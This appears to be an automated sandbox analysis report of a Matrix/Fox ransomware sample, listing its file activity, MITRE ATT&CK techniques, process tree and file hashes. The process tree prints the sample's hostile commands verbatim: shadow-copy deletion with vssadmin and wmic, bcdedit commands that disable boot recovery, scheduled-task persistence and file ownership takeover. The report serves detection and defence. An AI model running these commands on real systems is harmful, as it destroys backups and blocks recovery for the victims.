0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.0\Microsoft.NETCore.App.runtimeconfig.json 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.25\tr\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_it.properties 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\mesa3d.md 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\security\public_suffix_list.dat 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\api-ms-win-crt-convert-l1-1-0.dll 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\pa.pak 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.147.37\msedgeupdateres_de.dll 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.0\System.Globalization.Extensions.dll 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\cmm\GRAY.pf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.151\goopdateres_ta.dll 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\VisualElements\SmallLogoCanary.png 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Program Files\VideoLAN\VLC\lua\http\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.25\System.IO.Compression.Brotli.dll 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\wsdetect.dll 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.151\goopdateres_bg.dll 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\packetizer\libpacketizer_av1_plugin.dll 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\security\blacklist 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\browse_window.html 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\control\libhotkeys_plugin.dll 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.147.37\msedgeupdateres_ja.dll 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.25\System.Private.Xml.Linq.dll 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\de\UIAutomationClient.resources.dll 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\resource.dll 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\glib-lite.dll 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\vlc.mo 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\stream_out\libstream_out_display_plugin.dll 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\content-types.properties 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\demux\libts_plugin.dll 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File created C:\Program Files\VideoLAN\VLC\plugins\services_discovery\#ANN_README#.rtf 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\xalan.md 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.25\ja\ReachFramework.resources.dll 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\api-ms-win-crt-runtime-l1-1-0.dll 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\uk.pak 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\video_filter\libantiflicker_plugin.dll 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\santuario.md 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.0\System.Diagnostics.TraceSource.dll 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.25\ja\UIAutomationTypes.resources.dll 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files\Mozilla Firefox\application.ini 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\demux\libdiracsys_plugin.dll 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Notifications\SoftLandingAssetLight.gif 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\ext\meta-index 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2172 schtasks.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1464 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 736 powershell.exe 736 powershell.exe 736 powershell.exe 1584 dwJakgr264.exe 1584 dwJakgr264.exe 1584 dwJakgr264.exe 1584 dwJakgr264.exe 1584 dwJakgr264.exe 1584 dwJakgr264.exe 1584 dwJakgr264.exe 1584 dwJakgr264.exe 1584 dwJakgr264.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 1584 dwJakgr264.exe -
Suspicious use of AdjustPrivilegeToken 49 IoCs
description pid Process Token: SeDebugPrivilege 736 powershell.exe Token: SeTakeOwnershipPrivilege 1096 takeown.exe Token: SeDebugPrivilege 1584 dwJakgr264.exe Token: SeLoadDriverPrivilege 1584 dwJakgr264.exe Token: SeBackupPrivilege 3420 vssvc.exe Token: SeRestorePrivilege 3420 vssvc.exe Token: SeAuditPrivilege 3420 vssvc.exe Token: SeIncreaseQuotaPrivilege 4404 WMIC.exe Token: SeSecurityPrivilege 4404 WMIC.exe Token: SeTakeOwnershipPrivilege 4404 WMIC.exe Token: SeLoadDriverPrivilege 4404 WMIC.exe Token: SeSystemProfilePrivilege 4404 WMIC.exe Token: SeSystemtimePrivilege 4404 WMIC.exe Token: SeProfSingleProcessPrivilege 4404 WMIC.exe Token: SeIncBasePriorityPrivilege 4404 WMIC.exe Token: SeCreatePagefilePrivilege 4404 WMIC.exe Token: SeBackupPrivilege 4404 WMIC.exe Token: SeRestorePrivilege 4404 WMIC.exe Token: SeShutdownPrivilege 4404 WMIC.exe Token: SeDebugPrivilege 4404 WMIC.exe Token: SeSystemEnvironmentPrivilege 4404 WMIC.exe Token: SeRemoteShutdownPrivilege 4404 WMIC.exe Token: SeUndockPrivilege 4404 WMIC.exe Token: SeManageVolumePrivilege 4404 WMIC.exe Token: 33 4404 WMIC.exe Token: 34 4404 WMIC.exe Token: 35 4404 WMIC.exe Token: 36 4404 WMIC.exe Token: SeIncreaseQuotaPrivilege 4404 WMIC.exe Token: SeSecurityPrivilege 4404 WMIC.exe Token: SeTakeOwnershipPrivilege 4404 WMIC.exe Token: SeLoadDriverPrivilege 4404 WMIC.exe Token: SeSystemProfilePrivilege 4404 WMIC.exe Token: SeSystemtimePrivilege 4404 WMIC.exe Token: SeProfSingleProcessPrivilege 4404 WMIC.exe Token: SeIncBasePriorityPrivilege 4404 WMIC.exe Token: SeCreatePagefilePrivilege 4404 WMIC.exe Token: SeBackupPrivilege 4404 WMIC.exe Token: SeRestorePrivilege 4404 WMIC.exe Token: SeShutdownPrivilege 4404 WMIC.exe Token: SeDebugPrivilege 4404 WMIC.exe Token: SeSystemEnvironmentPrivilege 4404 WMIC.exe Token: SeRemoteShutdownPrivilege 4404 WMIC.exe Token: SeUndockPrivilege 4404 WMIC.exe Token: SeManageVolumePrivilege 4404 WMIC.exe Token: 33 4404 WMIC.exe Token: 34 4404 WMIC.exe Token: 35 4404 WMIC.exe Token: 36 4404 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3216 wrote to memory of 1048 3216 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe 87 PID 3216 wrote to memory of 1048 3216 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe 87 PID 3216 wrote to memory of 1048 3216 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe 87 PID 3216 wrote to memory of 2580 3216 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe 89 PID 3216 wrote to memory of 2580 3216 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe 89 PID 3216 wrote to memory of 2580 3216 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe 89 PID 3216 wrote to memory of 4404 3216 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe 97 PID 3216 wrote to memory of 4404 3216 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe 97 PID 3216 wrote to memory of 4404 3216 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe 97 PID 4404 wrote to memory of 736 4404 cmd.exe 99 PID 4404 wrote to memory of 736 4404 cmd.exe 99 PID 4404 wrote to memory of 736 4404 cmd.exe 99 PID 3216 wrote to memory of 1104 3216 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe 103 PID 3216 wrote to memory of 1104 3216 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe 103 PID 3216 wrote to memory of 1104 3216 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe 103 PID 3216 wrote to memory of 4352 3216 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe 104 PID 3216 wrote to memory of 4352 3216 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe 104 PID 3216 wrote to memory of 4352 3216 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe 104 PID 1104 wrote to memory of 1728 1104 cmd.exe 107 PID 1104 wrote to memory of 1728 1104 cmd.exe 107 PID 1104 wrote to memory of 1728 1104 cmd.exe 107 PID 1104 wrote to memory of 4744 1104 cmd.exe 108 PID 1104 wrote to memory of 4744 1104 cmd.exe 108 PID 1104 wrote to memory of 4744 1104 cmd.exe 108 PID 4352 wrote to memory of 3784 4352 cmd.exe 109 PID 4352 wrote to memory of 3784 4352 cmd.exe 109 PID 4352 wrote to memory of 3784 4352 cmd.exe 109 PID 1104 wrote to memory of 1820 1104 cmd.exe 110 PID 1104 wrote to memory of 1820 1104 cmd.exe 110 PID 1104 wrote to memory of 1820 1104 cmd.exe 110 PID 3216 wrote to memory of 908 3216 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe 111 PID 3216 wrote to memory of 908 3216 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe 111 PID 3216 wrote to memory of 908 3216 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe 111 PID 908 wrote to memory of 2192 908 cmd.exe 113 PID 908 wrote to memory of 2192 908 cmd.exe 113 PID 908 wrote to memory of 2192 908 cmd.exe 113 PID 908 wrote to memory of 4436 908 cmd.exe 115 PID 908 wrote to memory of 4436 908 cmd.exe 115 PID 908 wrote to memory of 4436 908 cmd.exe 115 PID 908 wrote to memory of 1096 908 cmd.exe 116 PID 908 wrote to memory of 1096 908 cmd.exe 116 PID 908 wrote to memory of 1096 908 cmd.exe 116 PID 908 wrote to memory of 540 908 cmd.exe 117 PID 908 wrote to memory of 540 908 cmd.exe 117 PID 908 wrote to memory of 540 908 cmd.exe 117 PID 540 wrote to memory of 4912 540 cmd.exe 118 PID 540 wrote to memory of 4912 540 cmd.exe 118 PID 540 wrote to memory of 4912 540 cmd.exe 118 PID 4912 wrote to memory of 1584 4912 dwJakgr2.exe 119 PID 4912 wrote to memory of 1584 4912 dwJakgr2.exe 119 PID 3784 wrote to memory of 5912 3784 wscript.exe 121 PID 3784 wrote to memory of 5912 3784 wscript.exe 121 PID 3784 wrote to memory of 5912 3784 wscript.exe 121 PID 5912 wrote to memory of 2172 5912 cmd.exe 123 PID 5912 wrote to memory of 2172 5912 cmd.exe 123 PID 5912 wrote to memory of 2172 5912 cmd.exe 123 PID 3784 wrote to memory of 6064 3784 wscript.exe 124 PID 3784 wrote to memory of 6064 3784 wscript.exe 124 PID 3784 wrote to memory of 6064 3784 wscript.exe 124 PID 6064 wrote to memory of 5596 6064 cmd.exe 126 PID 6064 wrote to memory of 5596 6064 cmd.exe 126 PID 6064 wrote to memory of 5596 6064 cmd.exe 126 PID 5432 wrote to memory of 1464 5432 cmd.exe 130 PID 5432 wrote to memory of 1464 5432 cmd.exe 130 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2192 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe"1⤵
- Matrix Ransomware
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3216 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWN3tkpU.exe"2⤵PID:1048
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWN3tkpU.exe"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWN3tkpU.exe" -n2⤵
- Executes dropped EXE
PID:2580
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\SSuD4uaW.txt"2⤵
- Suspicious use of WriteProcessMemory
PID:4404 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:736
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\m4Ny8X8V.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1104 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\m4Ny8X8V.bmp" /f3⤵
- Sets desktop wallpaper using registry
PID:1728
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵PID:4744
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵PID:1820
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\ienR2NRx.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:4352 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\ienR2NRx.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3784 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\uoUSUD5r.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵
- Suspicious use of WriteProcessMemory
PID:5912 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\uoUSUD5r.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:2172
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵
- Suspicious use of WriteProcessMemory
PID:6064 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:5596
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\xDTSb5xm.bat" "C:\Users\All Users\USOPrivate\UpdateStore\store.db""2⤵
- Suspicious use of WriteProcessMemory
PID:908 -
C:\Windows\SysWOW64\attrib.exeattrib -R -A -S "C:\Users\All Users\USOPrivate\UpdateStore\store.db"3⤵
- Views/modifies file attributes
PID:2192
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C3⤵PID:4436
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOPrivate\UpdateStore\store.db"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1096
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dwJakgr2.exe -accepteula "store.db" -nobanner3⤵
- Suspicious use of WriteProcessMemory
PID:540 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\dwJakgr2.exedwJakgr2.exe -accepteula "store.db" -nobanner4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4912 -
C:\Users\Admin\AppData\Local\Temp\dwJakgr264.exedwJakgr2.exe -accepteula "store.db" -nobanner5⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:1584
-
-
-
-
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\uoUSUD5r.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:5432 -
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet2⤵
- Interacts with shadow copies
PID:1464
-
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY DELETE2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4404
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No2⤵
- Modifies boot configuration data using bcdedit
PID:5564
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:5224
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Delete /TN DSHCA /F2⤵PID:6080
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3420
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Defense Evasion
File and Directory Permissions Modification
1Hide Artifacts
1Hidden Files and Directories
1Indicator Removal
2File Deletion
2Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8KB
MD55c044fb834c5c9f072443d3fc1809062
SHA1d5c9c6e322a75c9b2634d4c9359f9a8a9406db8b
SHA256e55b54c869fbc3b3669b2cc3a58ffb0b4330952f95ab160b54298017d0b0ccaa
SHA512c6940c695810519c4894803fae50db174f5491a737377450f41eb9ddf22894d2ef22d9d489b1de012efd4380584e85b449b561bc318af289fca5154365a3516d
-
Filesize
3KB
MD56a93e9c3049416aa21d37db4bd2e1262
SHA110b82877b9fb15d3264a1abf34946e236d938a24
SHA2564fd3bb3ce3117836476e2f329bcc862460778afe04e43b1b2317e8138fac8ca0
SHA5126f61aa7f96b9ca52cae93347947999c8edc138e6cfa529afc638f1168292f9df6496d460788589683f8ba4a7ae457318aa6e5d8106efb3106ba4a430e9d659c5
-
Filesize
1.2MB
MD5607d292bdcdde297252e002e613282ae
SHA10161d2dd582d064f7e7f50ccb43478ff0884916a
SHA2560676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65
SHA5122bdc2ff857f9f52aac5071d3a695f7baf822a971969ba263ad03769c41af7916b558bada6bfe76fe78f730235a4ca5d2dd1cf3eaa2a59c5efef06af0a798acb8
-
Filesize
16B
MD517d432845dc7cb55ac69d75cf72f7f5d
SHA17f3b6e6ab91b3a13c0611fe6e95befab691d5cc3
SHA256a7cd0523e7aca4fd8db39d49ce1fe6198b92956509bd360dae646798c2a251a4
SHA51225054cd4ec03675f28d0aa1aa09b691beacb9f9a1cf538179777d74a713e97457c39d56c787becc378fcdc31c62cbdf56546f8cee41f5f99f11b8798663104e0
-
Filesize
3KB
MD5b1d3bfba371350ab659dbe93370e5476
SHA1abbc80b0bd408085ce5198c5525b80a603d29153
SHA256cb3886c7ab0050763acd4e966c27805d54c930446e06f2bf04ae942cdca2fd1a
SHA512577beba3a45bc4db665ddb6bbd5796a3acfc99320e4b827bc67ab81cfe6fb4bdfc203095cfbee630988d8ba8b84597747d3b4c43d6413a796c4afad3d000eaf6
-
Filesize
181KB
MD52f5b509929165fc13ceab9393c3b911d
SHA1b016316132a6a277c5d8a4d7f3d6e2c769984052
SHA2560cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
SHA512c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8
-
Filesize
615B
MD557704b10f354c19968d019e8ef067b6c
SHA1d6dfab58dd8df9be790b60685438a5c90ceaaf4c
SHA25680f43411888f4103204b2818edaa48987d7a27f659f67bfbee8f237c4540cda2
SHA512e0fc46c4c134e5a446a625c72922c4808ebbee5b04cac3ce83b6487d77b340a4b0bbecbe8859e803a5934c1bc75f3cbe42bd49a095a2bfcd8e9fd04603026495
-
Filesize
7KB
MD5fc292b713838772f7f1e948761f0f8de
SHA150c2c14d1cf82c11427000cf59679b565e63fd36
SHA25665ac4747ebf5f60d535c0f98c596bb1ea7ec69dc1f584b951984f21f5d88044c
SHA5120861e88acc2a8fbb03c5f6102a03deabb61aeffcb0f17db78effde6c9b6d707bbe7ae77db1a778d1b91c95a1acb74d182e6e681348806967f9a79e030c197eef
-
Filesize
246B
MD58a0e56320b8c730499a7936edec60a17
SHA1aef71c7d38f9b8eaf34d48c79a4fd8b55f980d34
SHA256b91e0e3f1676b9dbecbd6b488065ed5e988fe3075ff374674d87ab1fb4e2e3d4
SHA512770fe8394825f60de669c03c13d4b30184f80ee460526d2a4fe841b0c212ac3f18f5056fc0ba16df095c54846b6a46d53378e905a11fd67f299b798fd969facf
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
221KB
MD53026bc2448763d5a9862d864b97288ff
SHA17d93a18713ece2e7b93e453739ffd7ad0c646e9e
SHA2567adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec
SHA512d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6
-
Filesize
260B
MD5ac22a9a273f0c766508e39c1d8ead629
SHA1ab6116ae3c5dfa703af330a981057a034f8092a1
SHA256e080e8ba56e13a5740ff3e33bc79f3a2ceaedef6e49e3b0f2dd702d0aea53241
SHA5125d1c8e501b68305614d9342cdff22bbe1c1f8d32261ec98a8332dcad8dd6011b0e4a7bd4bdeff009357434d55411245b4495f873391cb81fc2de0ecd655665fe
-
Filesize
265B
MD5123f2e706fca502e2bfc760e14670afe
SHA16c293b42892132b28d821a065a934616bc0730e6
SHA2565f6436ca74ab41abe600a400a3ff4176503fc930813c84115166b011d0b6086b
SHA51293e21788bd0f2d9a5fe60942ba271156b6f5180602f2f6d9b9c0014fbcda2d7598d81b323b86850ef1476b47c74092187e3247e0b749054a9608906cdf76141f